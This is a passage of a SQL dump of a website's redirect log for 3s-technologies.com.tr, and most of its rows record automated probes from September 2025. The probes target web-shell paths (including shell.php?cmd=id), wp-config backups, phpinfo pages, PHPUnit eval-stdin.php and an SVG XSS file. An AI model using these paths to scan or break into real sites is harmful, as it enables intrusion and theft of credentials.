00:00:00',301),(46893,'http://3s-technologies.com.tr/tr/ant.php',NULL,'','',37,0,'2025-09-15 18:44:17','0000-00-00 00:00:00',301),(46894,'http://3s-technologies.com.tr/tr/mn.php',NULL,'','',2,0,'2025-09-15 18:44:19','0000-00-00 00:00:00',301),(46895,'http://3s-technologies.com.tr/tr/aiwy2a.php',NULL,'','',2,0,'2025-09-15 18:44:23','0000-00-00 00:00:00',301),(46896,'http://3s-technologies.com.tr/tr/amax.php',NULL,'','',69,0,'2025-09-15 18:44:24','0000-00-00 00:00:00',301),(46897,'http://3s-technologies.com.tr/tr/stuk4z.php',NULL,'','',2,0,'2025-09-15 18:44:24','0000-00-00 00:00:00',301),(46898,'http://3s-technologies.com.tr/tr/acxx.php',NULL,'','',15,0,'2025-09-15 18:44:26','0000-00-00 00:00:00',301),(46899,'http://3s-technologies.com.tr/tr/p1u.php',NULL,'','',5,0,'2025-09-15 18:44:28','0000-00-00 00:00:00',301),(46900,'http://3s-technologies.com.tr/tr/dom.php',NULL,'','',12,0,'2025-09-15 18:44:29','0000-00-00 00:00:00',301),(46901,'https://3s-technologies.com.tr/tr/about',NULL,'','',3,0,'2025-09-15 21:07:23','0000-00-00 00:00:00',301),(46902,'https://3s-technologies.com.tr/tr/sitemap1.xml',NULL,'','',1,0,'2025-09-15 21:09:40','0000-00-00 00:00:00',301),(46903,'https://3s-technologies.com.tr/tr/sitemaps/sitemap-videos.xml',NULL,'','',1,0,'2025-09-15 21:09:49','0000-00-00 00:00:00',301),(46904,'https://www.3s-technologies.com.tr/tr/akrilik-işleme-acrylic-processing\n',NULL,'','',1,0,'2025-09-15 21:58:13','0000-00-00 00:00:00',301),(46905,'http://mail.3s-technologies.com.tr/tr/makeasmtp.php',NULL,'','',49,0,'2025-09-15 23:42:39','0000-00-00 00:00:00',301),(46906,'http://mail.3s-technologies.com.tr/tr/sh.php',NULL,'','',5,0,'2025-09-15 23:42:52','0000-00-00 00:00:00',301),(46907,'http://mail.3s-technologies.com.tr/tr/fm.php',NULL,'','',50,0,'2025-09-15 23:43:09','0000-00-00 00:00:00',301),(46908,'http://mail.3s-technologies.com.tr/tr/wander.php',NULL,'','',12,0,'2025-09-15 23:43:10','0000-00-00 00:00:00',301),(46909,'http://3s-technologies.com.tr/tr/tinny.php?p=',NULL,'','',1,0,'2025-09-16 09:38:38','0000-00-00 00:00:00',301),(46910,'http://3s-technologies.com.tr/tr/klex.php',NULL,'','',16,0,'2025-09-16 09:39:05','0000-00-00 00:00:00',301),(46911,'http://3s-technologies.com.tr/tr/angelv2.php',NULL,'','',18,0,'2025-09-16 09:39:10','0000-00-00 00:00:00',301),(46912,'http://3s-technologies.com.tr/tr/ltsxppjj.php',NULL,'','',5,0,'2025-09-16 09:39:17','0000-00-00 00:00:00',301),(46913,'http://3s-technologies.com.tr/tr/xo.php',NULL,'','',18,0,'2025-09-16 09:39:18','0000-00-00 00:00:00',301),(46914,'http://3s-technologies.com.tr/tr/pnsi.php7',NULL,'','',3,0,'2025-09-16 09:39:20','0000-00-00 00:00:00',301),(46915,'http://3s-technologies.com.tr/tr/akk.php',NULL,'','',22,0,'2025-09-16 09:39:22','0000-00-00 00:00:00',301),(46916,'http://3s-technologies.com.tr/tr/mysql/dbadmin/index.php',NULL,'','',6,0,'2025-09-17 08:19:41','0000-00-00 00:00:00',301),(46917,'http://3s-technologies.com.tr/tr/wp-config.php.un~',NULL,'','',4,0,'2025-09-17 08:19:41','0000-00-00 00:00:00',301),(46918,'http://3s-technologies.com.tr/tr/wp-config.php.c',NULL,'','',5,0,'2025-09-17 08:19:42','0000-00-00 00:00:00',301),(46919,'http://3s-technologies.com.tr/tr/wp-config.php_old2011',NULL,'','',4,0,'2025-09-17 08:19:43','0000-00-00 00:00:00',301),(46920,'http://3s-technologies.com.tr/tr/info.php.save',NULL,'','',2,0,'2025-09-17 08:19:44','0000-00-00 00:00:00',301),(46921,'http://3s-technologies.com.tr/tr/service/dashboard/phpinfo.php',NULL,'','',2,0,'2025-09-17 08:19:44','0000-00-00 00:00:00',301),(46922,'http://3s-technologies.com.tr/tr/api/backend/info.php',NULL,'','',2,0,'2025-09-17 08:19:47','0000-00-00 00:00:00',301),(46923,'http://3s-technologies.com.tr/tr/product/phpinfo.php',NULL,'','',2,0,'2025-09-17 08:19:47','0000-00-00 00:00:00',301),(46924,'http://3s-technologies.com.tr/tr/deploy/develop/info.php',NULL,'','',2,0,'2025-09-17 08:19:48','0000-00-00 00:00:00',301),(46925,'http://3s-technologies.com.tr/tr/lms/laravel/info.php',NULL,'','',2,0,'2025-09-17 08:19:49','0000-00-00 00:00:00',301),(46926,'http://3s-technologies.com.tr/tr/qa/backend/info.php',NULL,'','',2,0,'2025-09-17 08:19:49','0000-00-00 00:00:00',301),(46927,'http://3s-technologies.com.tr/tr/old-wp-config.php',NULL,'','',2,0,'2025-09-17 08:19:51','0000-00-00 00:00:00',301),(46928,'http://3s-technologies.com.tr/tr/toolsadminer.php',NULL,'','',1,0,'2025-09-17 08:19:52','0000-00-00 00:00:00',301),(46929,'http://3s-technologies.com.tr/tr/wordpress/wp-config.php.7',NULL,'','',1,0,'2025-09-17 08:19:52','0000-00-00 00:00:00',301),(46930,'http://3s-technologies.com.tr/tr/default/dashboard/phpinfo.php',NULL,'','',2,0,'2025-09-17 08:19:53','0000-00-00 00:00:00',301),(46931,'http://3s-technologies.com.tr/tr/conf/server/info.php',NULL,'','',3,0,'2025-09-17 08:19:54','0000-00-00 00:00:00',301),(46932,'http://3s-technologies.com.tr/tr/public_html/time.php',NULL,'','',2,0,'2025-09-17 08:19:54','0000-00-00 00:00:00',301),(46933,'http://3s-technologies.com.tr/tr/tests/lara/phpinfo.php',NULL,'','',2,0,'2025-09-17 08:19:55','0000-00-00 00:00:00',301),(46934,'http://3s-technologies.com.tr/tr/lara/dev/info.php',NULL,'','',2,0,'2025-09-17 08:19:56','0000-00-00 00:00:00',301),(46935,'http://3s-technologies.com.tr/tr/web/help/phpinfo.php',NULL,'','',2,0,'2025-09-17 08:19:56','0000-00-00 00:00:00',301),(46936,'http://3s-technologies.com.tr/tr/crm/time.php',NULL,'','',2,0,'2025-09-17 08:19:57','0000-00-00 00:00:00',301),(46937,'http://3s-technologies.com.tr/tr/user/crm/phpinfo.php',NULL,'','',2,0,'2025-09-17 08:19:58','0000-00-00 00:00:00',301),(46938,'http://3s-technologies.com.tr/tr/bot/linusadmin-phpinfo.php',NULL,'','',3,0,'2025-09-17 08:19:58','0000-00-00 00:00:00',301),(46939,'http://3s-technologies.com.tr/tr/stg/help/phpinfo.php',NULL,'','',2,0,'2025-09-17 08:19:59','0000-00-00 00:00:00',301),(46940,'http://3s-technologies.com.tr/tr/dev/backend/info.php',NULL,'','',2,0,'2025-09-17 08:19:59','0000-00-00 00:00:00',301),(46941,'http://3s-technologies.com.tr/tr/adm/development/phpinfo.php',NULL,'','',3,0,'2025-09-17 08:20:00','0000-00-00 00:00:00',301),(46942,'http://3s-technologies.com.tr/tr/users/crm/phpinfo.php',NULL,'','',2,0,'2025-09-17 08:20:01','0000-00-00 00:00:00',301),(46943,'http://3s-technologies.com.tr/tr/development/service/phpinfo.php',NULL,'','',2,0,'2025-09-17 08:20:02','0000-00-00 00:00:00',301),(46944,'http://3s-technologies.com.tr/tr/user/infophp.php',NULL,'','',2,0,'2025-09-17 08:20:02','0000-00-00 00:00:00',301),(46945,'http://3s-technologies.com.tr/tr/function/lara/info.php',NULL,'','',2,0,'2025-09-17 08:20:03','0000-00-00 00:00:00',301),(46946,'http://3s-technologies.com.tr/tr/prod/infophp.php',NULL,'','',2,0,'2025-09-17 08:20:03','0000-00-00 00:00:00',301),(46947,'http://3s-technologies.com.tr/tr/stage/current/info.php',NULL,'','',2,0,'2025-09-17 08:20:04','0000-00-00 00:00:00',301),(46948,'http://3s-technologies.com.tr/tr/dev/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2025-09-17 08:20:13','0000-00-00 00:00:00',301),(46949,'http://3s-technologies.com.tr/tr/filei.php',NULL,'','',5,0,'2025-09-17 11:25:17','0000-00-00 00:00:00',301),(46950,'http://3s-technologies.com.tr/tr/xhouf.php',NULL,'','',3,0,'2025-09-17 11:25:28','0000-00-00 00:00:00',301),(46951,'http://3s-technologies.com.tr/tr/public/wsr2.php',NULL,'','',3,0,'2025-09-17 11:25:32','0000-00-00 00:00:00',301),(46952,'https://3s-technologies.com.tr/tr/imgproxy/rs:fill:3840:3840:0:0/plain/https:/images.ctfassets.net/h0jtq0wdx190/3hivodbwvd7qcdxed53fx0/484ffd97340457cd7f1b954be06b5432/svg_webpage_xss.svg',NULL,'https://3s-technologies.com.tr/imgproxy/rs:fill:3840:3840:0:0/plain/https://images.ctfassets.net/h0jtq0wdx190/3HivOdbWvD7QCDXEd53fx0/484ffd97340457cd7f1b954be06b5432/SVG_WEBPAGE_XSS.svg','',2,0,'2025-09-17 12:59:50','0000-00-00 00:00:00',301),(46953,'http://3s-technologies.com.tr/tr/templates/beez/admin.php',NULL,'http://3s-technologies.com.tr//templates/beez/admin.php','',1,0,'2025-09-17 20:56:30','0000-00-00 00:00:00',301),(46954,'http://3s-technologies.com.tr/tr/wp-content/plugins/deu/ms.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/deu/ms.php','',4,0,'2025-09-17 20:56:34','0000-00-00 00:00:00',301),(46955,'http://3s-technologies.com.tr/tr/modules/ets_whatsapp/new.php',NULL,'http://3s-technologies.com.tr//modules/ets_whatsapp/new.php','',1,0,'2025-09-17 20:56:37','0000-00-00 00:00:00',301),(46956,'http://3s-technologies.com.tr/tr/templates/yamato/index.php',NULL,'http://3s-technologies.com.tr//templates/Yamato/index.php','',1,0,'2025-09-17 20:56:39','0000-00-00 00:00:00',301),(46957,'http://3s-technologies.com.tr/tr/admins.php',NULL,'http://3s-technologies.com.tr//admins.php','',10,0,'2025-09-17 20:56:42','0000-00-00 00:00:00',301),(46958,'http://3s-technologies.com.tr/tr/wp-content/plugins/aafr/uploader.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/aafr/uploader.php','',4,0,'2025-09-17 20:56:46','0000-00-00 00:00:00',301),(46959,'http://3s-technologies.com.tr/tr/wp-content/plugins/hanau/akc.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/hanau/akc.php','',4,0,'2025-09-17 20:56:47','0000-00-00 00:00:00',301),(46960,'http://3s-technologies.com.tr/tr/templates/globy/index.php',NULL,'http://3s-technologies.com.tr//templates/Globy/index.php','',1,0,'2025-09-17 20:56:49','0000-00-00 00:00:00',301),(46961,'http://3s-technologies.com.tr/tr/wp-content/uploads/2025/04/shell.php?cmd=id',NULL,'http://3s-technologies.com.tr//wp-content/uploads/2025/04/shell.php?cmd=id','',1,0,'2025-09-17 20:56:50','0000-00-00 00:00:00',301),(46962,'http://3s-technologies.com.tr/tr/vendor/htmlawed/htmlawed/gel4y.php',NULL,'http://3s-technologies.com.tr//vendor/htmlawed/htmlawed/gel4y.php','',1,0,'2025-09-17 20:56:58','0000-00-00 00:00:00',301),(46963,'http://3s-technologies.com.tr/tr/libraries/joomla/index.php',NULL,'http://3s-technologies.com.tr//libraries/joomla/index.php','',1,0,'2025-09-17 20:57:01','0000-00-00 00:00:00',301),(46964,'http://3s-technologies.com.tr/tr/wp-content/plugins/view-source/ioxi-o2.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/view-source/ioxi-o2.php','',4,0,'2025-09-17 20:57:02','0000-00-00 00:00:00',301),(46965,'http://3s-technologies.com.tr/tr/vendor/composer/about.php',NULL,'http://3s-technologies.com.tr//vendor/composer/about.php','',1,0,'2025-09-17 20:57:16','0000-00-00 00:00:00',301),(46966,'http://3s-technologies.com.tr/tr/templates/rhuk_solarflare_ii/index.php',NULL,'http://3s-technologies.com.tr//templates/rhuk_solarflare_ii/index.php','',1,0,'2025-09-17 20:57:17','0000-00-00 00:00:00',301),(46967,'http://3s-technologies.com.tr/tr/templates/globy/error.php',NULL,'http://3s-technologies.com.tr//templates/Globy/error.php','',1,0,'2025-09-17 20:57:24','0000-00-00 00:00:00',301),(46968,'http://3s-technologies.com.tr/tr/sites/default/files/index.php',NULL,'http://3s-technologies.com.tr//sites/default/files/index.php','',1,0,'2025-09-17 20:57:25','0000-00-00 00:00:00',301),(46969,'http://3s-technologies.com.tr/tr/mod/lanciau/lang/en/lanciau.php',NULL,'http://3s-technologies.com.tr//mod/lanciau/lang/en/lanciau.php','',1,0,'2025-09-17 20:57:28','0000-00-00 00:00:00',301),(46970,'http://3s-technologies.com.tr/tr/wp-content/plugins/elex/elex.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/elex/elex.php','',4,0,'2025-09-17 20:57:29','0000-00-00 00:00:00',301),(46971,'http://3s-technologies.com.tr/tr/wp-content/plugins/geu/geu.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/geu/geu.php','',4,0,'2025-09-17 20:57:31','0000-00-00 00:00:00',301),(46972,'http://3s-technologies.com.tr/tr/templates/isis/error.php',NULL,'http://3s-technologies.com.tr//templates/isis/error.php','',1,0,'2025-09-17 20:57:40','0000-00-00 00:00:00',301),(46973,'http://3s-technologies.com.tr/tr/wp-content/themes/pwnd-themes/archive.php',NULL,'http://3s-technologies.com.tr//wp-content/themes/pwnd-themes/archive.php','',1,0,'2025-09-17 20:57:41','0000-00-00 00:00:00',301),(46974,'http://3s-technologies.com.tr/tr/templates/hoxa/error.php',NULL,'http://3s-technologies.com.tr//templates/Hoxa/error.php','',1,0,'2025-09-17 20:57:42','0000-00-00 00:00:00',301),(46975,'http://3s-technologies.com.tr/tr/templates/begindot/error.php',NULL,'http://3s-technologies.com.tr//templates/BeginDot/error.php','',1,0,'2025-09-17 20:57:43','0000-00-00 00:00:00',301),(46976,'http://3s-technologies.com.tr/tr/templates/raees/index.php',NULL,'http://3s-technologies.com.tr//templates/Raees/index.php','',1,0,'2025-09-17 20:57:44','0000-00-00 00:00:00',301),(46977,'http://3s-technologies.com.tr/tr/templates/madeyourweb/error.php',NULL,'http://3s-technologies.com.tr//templates/madeyourweb/error.php','',1,0,'2025-09-17 20:57:46','0000-00-00 00:00:00',301),(46978,'http://3s-technologies.com.tr/tr/templates/binv/error.php',NULL,'http://3s-technologies.com.tr//templates/Binv/error.php','',1,0,'2025-09-17 20:57:47','0000-00-00 00:00:00',301),(46979,'http://3s-technologies.com.tr/tr/templates/beez2/index.php',NULL,'http://3s-technologies.com.tr//templates/Beez2/index.php','',1,0,'2025-09-17 20:57:48','0000-00-00 00:00:00',301),(46980,'http://3s-technologies.com.tr/tr/templates/atum/error.php',NULL,'http://3s-technologies.com.tr//templates/Atum/error.php','',1,0,'2025-09-17 20:57:50','0000-00-00 00:00:00',301),(46981,'http://3s-technologies.com.tr/tr/local/index.php',NULL,'http://3s-technologies.com.tr//local/index.php','',1,0,'2025-09-17 20:57:57','0000-00-00 00:00:00',301),(46982,'http://3s-technologies.com.tr/tr/templates/cassiopeia/index.php',NULL,'http://3s-technologies.com.tr//templates/cassiopeia/index.php','',6,0,'2025-09-17 20:58:00','0000-00-00 00:00:00',301),(46983,'http://3s-technologies.com.tr/tr/theme/lanciau/lang/en/theme_lanciau.php',NULL,'http://3s-technologies.com.tr//theme/lanciau/lang/en/theme_lanciau.php','',1,0,'2025-09-17 20:58:14','0000-00-00 00:00:00',301),(46984,'http://3s-technologies.com.tr/tr/wp-content/plugins/phpad/as.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/phpad/as.php','',4,0,'2025-09-17 20:58:16','0000-00-00 00:00:00',301),(46985,'http://3s-technologies.com.tr/tr/templates/atum/index.php',NULL,'http://3s-technologies.com.tr//templates/Atum/index.php','',1,0,'2025-09-17 20:58:19','0000-00-00 00:00:00',301),(46986,'http://3s-technologies.com.tr/tr/wp-content/plugins/view-ad/ms.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/view-ad/ms.php','',4,0,'2025-09-17 20:58:22','0000-00-00 00:00:00',301),(46987,'http://3s-technologies.com.tr/tr/templates/hoxa/index.php',NULL,'http://3s-technologies.com.tr//templates/Hoxa/index.php','',1,0,'2025-09-17 20:58:26','0000-00-00 00:00:00',301),(46988,'http://3s-technologies.com.tr/tr/templates/isis/index.php',NULL,'http://3s-technologies.com.tr//templates/isis/index.php','',1,0,'2025-09-17 20:58:28','0000-00-00 00:00:00',301),(46989,'http://3s-technologies.com.tr/tr/plugins/content/apismtp/setting-api.php',NULL,'http://3s-technologies.com.tr//plugins/content/apismtp/setting-api.php','',1,0,'2025-09-17 20:58:29','0000-00-00 00:00:00',301),(46990,'http://3s-technologies.com.tr/tr/templates/aaika/error.php',NULL,'http://3s-technologies.com.tr//templates/Aaika/error.php','',1,0,'2025-09-17 20:58:31','0000-00-00 00:00:00',301),(46991,'http://3s-technologies.com.tr/tr/templates/binv/index.php',NULL,'http://3s-technologies.com.tr//templates/Binv/index.php','',1,0,'2025-09-17 20:58:34','0000-00-00 00:00:00',301),(46992,'http://3s-technologies.com.tr/tr/templates/jmart/error.php',NULL,'http://3s-technologies.com.tr//templates/JMart/error.php','',1,0,'2025-09-17 20:58:38','0000-00-00 00:00:00',301),(46993,'http://3s-technologies.com.tr/tr/templates/cassiopeia/error.php',NULL,'http://3s-technologies.com.tr//templates/Cassiopeia/error.php','',2,0,'2025-09-17 20:58:40','0000-00-00 00:00:00',301),(46994,'http://3s-technologies.com.tr/tr/wp-admin/maint/ova/index.php',NULL,'http://3s-technologies.com.tr//wp-admin/maint/ova/index.php','',1,0,'2025-09-17 20:58:44','0000-00-00 00:00:00',301),(46995,'http://3s-technologies.com.tr/tr/templates/eatoreh/index.php',NULL,'http://3s-technologies.com.tr//templates/Eatoreh/index.php','',1,0,'2025-09-17 20:58:54','0000-00-00 00:00:00',301),(46996,'http://3s-technologies.com.tr/tr/templates/rhuk_milkyway/error.php',NULL,'http://3s-technologies.com.tr//templates/rhuk_milkyway/error.php','',1,0,'2025-09-17 20:58:55','0000-00-00 00:00:00',301),(46997,'http://3s-technologies.com.tr/tr/templates/ja-helio-farsi/index.php',NULL,'http://3s-technologies.com.tr//templates/ja-helio-farsi/index.php','',1,0,'2025-09-17 20:58:56','0000-00-00 00:00:00',301),(46998,'http://3s-technologies.com.tr/tr/templates/aaika/index.php',NULL,'http://3s-technologies.com.tr//templates/Aaika/index.php','',1,0,'2025-09-17 20:59:02','0000-00-00 00:00:00',301),(46999,'http://3s-technologies.com.tr/tr/plugins/content/apismtp/wp-domain.php',NULL,'http://3s-technologies.com.tr//plugins/content/apismtp/wp-domain.php','',1,0,'2025-09-17 20:59:06','0000-00-00 00:00:00',301),(47000,'http://3s-technologies.com.tr/tr/templates/madeyourweb/index.php',NULL,'http://3s-technologies.com.tr//templates/madeyourweb/index.php','',1,0,'2025-09-17 20:59:11','0000-00-00 00:00:00',301),(47001,'http://3s-technologies.com.tr/tr/templates/hathor/index.php',NULL,'http://3s-technologies.com.tr//templates/hathor/index.php','',1,0,'2025-09-17 20:59:12','0000-00-00 00:00:00',301),(47002,'http://3s-technologies.com.tr/tr/templates/genius/error.php',NULL,'http://3s-technologies.com.tr//templates/Genius/error.php','',1,0,'2025-09-17 20:59:14','0000-00-00 00:00:00',301),(47003,'http://3s-technologies.com.tr/tr/templates/eatoreh/error.php',NULL,'http://3s-technologies.com.tr//templates/Eatoreh/error.php','',1,0,'2025-09-17 20:59:19','0000-00-00 00:00:00',301),(47004,'http://3s-technologies.com.tr/tr/templates/rivers/error.php',NULL,'http://3s-technologies.com.tr//templates/RiverS/error.php','',1,0,'2025-09-17 20:59:24','0000-00-00 00:00:00',301),(47005,'http://3s-technologies.com.tr/tr/templates/hathor/error.php',NULL,'http://3s-technologies.com.tr//templates/hathor/error.php','',1,0,'2025-09-17 20:59:26','0000-00-00 00:00:00',301),(47006,'http://3s-technologies.com.tr/tr/templates/rivers/index.php',NULL,'http://3s-technologies.com.tr//templates/RiverS/index.php','',1,0,'2025-09-17 20:59:30','0000-00-00 00:00:00',301),(47007,'http://3s-technologies.com.tr/tr/templates/yamato/error.php',NULL,'http://3s-technologies.com.tr//templates/Yamato/error.php','',1,0,'2025-09-17 20:59:34','0000-00-00 00:00:00',301),(47008,'http://3s-technologies.com.tr/tr/local/moodle_webshell/index.php',NULL,'http://3s-technologies.com.tr//local/moodle_webshell/index.php','',1,0,'2025-09-17 20:59:37','0000-00-00 00:00:00',301),(47009,'http://3s-technologies.com.tr/tr/wp-content/plugins/apikey/b1ack.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/apikey/b1ack.php','',1,0,'2025-09-17 20:59:40','0000-00-00 00:00:00',301),(47010,'http://3s-technologies.com.tr/tr/templates/jmart/index.php',NULL,'http://3s-technologies.com.tr//templates/JMart/index.php','',1,0,'2025-09-17 20:59:42','0000-00-00 00:00:00',301),(47011,'http://3s-technologies.com.tr/tr/modules/ets_whatsapp/security.php',NULL,'http://3s-technologies.com.tr//modules/ets_whatsapp/security.php','',1,0,'2025-09-17 20:59:43','0000-00-00 00:00:00',301),(47012,'http://3s-technologies.com.tr/tr/wp-2025.php',NULL,'http://3s-technologies.com.tr//wp-2025.php','',1,0,'2025-09-17 20:59:46','0000-00-00 00:00:00',301),(47013,'http://3s-technologies.com.tr/tr/templates/genius/index.php',NULL,'http://3s-technologies.com.tr//templates/Genius/index.php','',1,0,'2025-09-17 20:59:56','0000-00-00 00:00:00',301),(47014,'http://3s-technologies.com.tr/tr/dos.php',NULL,'http://3s-technologies.com.tr//dos.php','',1,0,'2025-09-17 20:59:59','0000-00-00 00:00:00',301),(47015,'http://3s-technologies.com.tr/tr/components/com_newsfeeds/models/index.php',NULL,'http://3s-technologies.com.tr//components/com_newsfeeds/models/index.php','',1,0,'2025-09-17 21:00:00','0000-00-00 00:00:00',301),(47016,'http://3s-technologies.com.tr/tr/rec/config.php?p=',NULL,'http://3s-technologies.com.tr//rec/config.php?p=','',1,0,'2025-09-17 21:00:01','0000-00-00 00:00:00',301),(47017,'http://3s-technologies.com.tr/tr/wp-content/plugins/yanierin/akcc.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/yanierin/akcc.php','',15,0,'2025-09-17 21:00:04','0000-00-00 00:00:00',301),(47018,'http://3s-technologies.com.tr/tr/templates/raees/error.php',NULL,'http://3s-technologies.com.tr//templates/Raees/error.php','',1,0,'2025-09-17 21:00:05','0000-00-00 00:00:00',301),(47019,'http://3s-technologies.com.tr/tr/templates/begindot/index.php',NULL,'http://3s-technologies.com.tr//templates/BeginDot/index.php','',1,0,'2025-09-17 21:00:06','0000-00-00 00:00:00',301),(47020,'http://3s-technologies.com.tr/tr/templates/rhuk_solarflare_ii/error.php',NULL,'http://3s-technologies.com.tr//templates/rhuk_solarflare_ii/error.php','',1,0,'2025-09-17 21:00:07','0000-00-00 00:00:00',301),(47021,'http://3s-technologies.com.tr/tr/templates/beez2/error.php',NULL,'http://3s-technologies.com.tr//templates/Beez2/error.php','',1,0,'2025-09-17 21:00:08','0000-00-00 00:00:00',301),(47022,'http://3s-technologies.com.tr/tr/templates/jollyany/index.php',NULL,'http://3s-technologies.com.tr//templates/Jollyany/index.php','',1,0,'2025-09-17 21:00:14','0000-00-00 00:00:00',301),(47023,'http://3s-technologies.com.tr/tr/templates/jollyany/error.php',NULL,'http://3s-technologies.com.tr//templates/Jollyany/error.php','',1,0,'2025-09-17 21:00:17','0000-00-00 00:00:00',301),(47024,'https://www.3s-technologies.com.tr/tr/index/function.php',NULL,'https://www.3s-technologies.com.tr//index/function.php','',1,0,'2025-09-18 00:33:40','0000-00-00 00:00:00',301),(47025,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/about.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/about.php','',1,0,'2025-09-18 00:33:41','0000-00-00 00:00:00',301),(47026,'https://www.3s-technologies.com.tr/tr/wp-admin/js/index.php',NULL,'https://www.3s-technologies.com.tr//wp-admin/js/index.php','',1,0,'2025-09-18 00:33:42','0000-00-00 00:00:00',301),(47027,'https://www.3s-technologies.com.tr/tr/wp-admin/maint/index.php',NULL,'https://www.3s-technologies.com.tr//wp-admin/maint/index.php','',1,0,'2025-09-18 00:33:43','0000-00-00 00:00:00',301),(47028,'https://www.3s-technologies.com.tr/tr/templates/beez/admin.php',NULL,'https://www.3s-technologies.com.tr//templates/beez/admin.php','',1,0,'2025-09-18 00:33:44','0000-00-00 00:00:00',301),(47029,'https://www.3s-technologies.com.tr/tr/akcc.php',NULL,'https://www.3s-technologies.com.tr//akcc.php','',1,0,'2025-09-18 00:33:45','0000-00-00 00:00:00',301),(47030,'https://www.3s-technologies.com.tr/tr/menu.php',NULL,'https://www.3s-technologies.com.tr//menu.php','',1,0,'2025-09-18 00:33:46','0000-00-00 00:00:00',301),(47031,'https://www.3s-technologies.com.tr/tr/wp-admin/images/index.php',NULL,'https://www.3s-technologies.com.tr//wp-admin/images/index.php','',1,0,'2025-09-18 00:33:46','0000-00-00 00:00:00',301),(47032,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/deu/ms.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/deu/ms.php','',1,0,'2025-09-18 00:33:47','0000-00-00 00:00:00',301),(47033,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/dummyyummy/wp-signup.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/dummyyummy/wp-signup.php','',1,0,'2025-09-18 00:33:48','0000-00-00 00:00:00',301),(47034,'https://www.3s-technologies.com.tr/tr/themes/zmousse/otuz1.php',NULL,'https://www.3s-technologies.com.tr//themes/zMousse/otuz1.php','',1,0,'2025-09-18 00:33:49','0000-00-00 00:00:00',301),(47035,'https://www.3s-technologies.com.tr/tr/modules/ets_whatsapp/new.php',NULL,'https://www.3s-technologies.com.tr//modules/ets_whatsapp/new.php','',1,0,'2025-09-18 00:33:50','0000-00-00 00:00:00',301),(47036,'https://www.3s-technologies.com.tr/tr/templates/yamato/index.php',NULL,'https://www.3s-technologies.com.tr//templates/Yamato/index.php','',1,0,'2025-09-18 00:33:51','0000-00-00 00:00:00',301),(47037,'https://www.3s-technologies.com.tr/tr/wp.php',NULL,'https://www.3s-technologies.com.tr//wp.php','',1,0,'2025-09-18 00:33:52','0000-00-00 00:00:00',301),(47038,'https://www.3s-technologies.com.tr/tr/admins.php',NULL,'https://www.3s-technologies.com.tr//admins.php','',1,0,'2025-09-18 00:33:53','0000-00-00 00:00:00',301),(47039,'https://www.3s-technologies.com.tr/tr/wp-includes/js/tinymce/skins/lightgray/img/index.php',NULL,'https://www.3s-technologies.com.tr//wp-includes/js/tinymce/skins/lightgray/img/index.php','',1,0,'2025-09-18 00:33:54','0000-00-00 00:00:00',301),(47040,'https://www.3s-technologies.com.tr/tr/wp-includes/style-engine/wp-conflg.php',NULL,'https://www.3s-technologies.com.tr//wp-includes/style-engine/wp-conflg.php','',1,0,'2025-09-18 00:33:55','0000-00-00 00:00:00',301),(47041,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/aafr/uploader.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/aafr/uploader.php','',1,0,'2025-09-18 00:33:56','0000-00-00 00:00:00',301),(47042,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/hanau/akc.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/hanau/akc.php','',1,0,'2025-09-18 00:33:57','0000-00-00 00:00:00',301),(47043,'https://www.3s-technologies.com.tr/tr/templates/globy/index.php',NULL,'https://www.3s-technologies.com.tr//templates/Globy/index.php','',1,0,'2025-09-18 00:33:59','0000-00-00 00:00:00',301),(47044,'https://www.3s-technologies.com.tr/tr/wp-content/uploads/2025/04/shell.php?cmd=id',NULL,'https://www.3s-technologies.com.tr//wp-content/uploads/2025/04/shell.php?cmd=id','',1,0,'2025-09-18 00:34:00','0000-00-00 00:00:00',301),(47045,'https://www.3s-technologies.com.tr/tr/wp-content/themes/calmly/issue.php',NULL,'https://www.3s-technologies.com.tr//wp-content/themes/calmly/issue.php','',1,0,'2025-09-18 00:34:01','0000-00-00 00:00:00',301),(47046,'https://www.3s-technologies.com.tr/tr/bk/index.php',NULL,'https://www.3s-technologies.com.tr//bk/index.php','',1,0,'2025-09-18 00:34:02','0000-00-00 00:00:00',301),(47047,'https://www.3s-technologies.com.tr/tr/admin/controller/extension/extension/index.php',NULL,'https://www.3s-technologies.com.tr//admin/controller/extension/extension/index.php','',1,0,'2025-09-18 00:34:03','0000-00-00 00:00:00',301),(47048,'https://www.3s-technologies.com.tr/tr/.well-known/about.php',NULL,'https://www.3s-technologies.com.tr//.well-known/about.php','',1,0,'2025-09-18 00:34:04','0000-00-00 00:00:00',301),(47049,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/ioxi/ioxi/dropdown.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/ioxi/ioxi/dropdown.php','',1,0,'2025-09-18 00:34:04','0000-00-00 00:00:00',301),(47050,'https://www.3s-technologies.com.tr/tr/vendor/htmlawed/htmlawed/gel4y.php',NULL,'https://www.3s-technologies.com.tr//vendor/htmlawed/htmlawed/gel4y.php','',1,0,'2025-09-18 00:34:06','0000-00-00 00:00:00',301),(47051,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/shell/noimg.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/shell/noimg.php','',1,0,'2025-09-18 00:34:07','0000-00-00 00:00:00',301),(47052,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/index.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/index.php','',1,0,'2025-09-18 00:34:08','0000-00-00 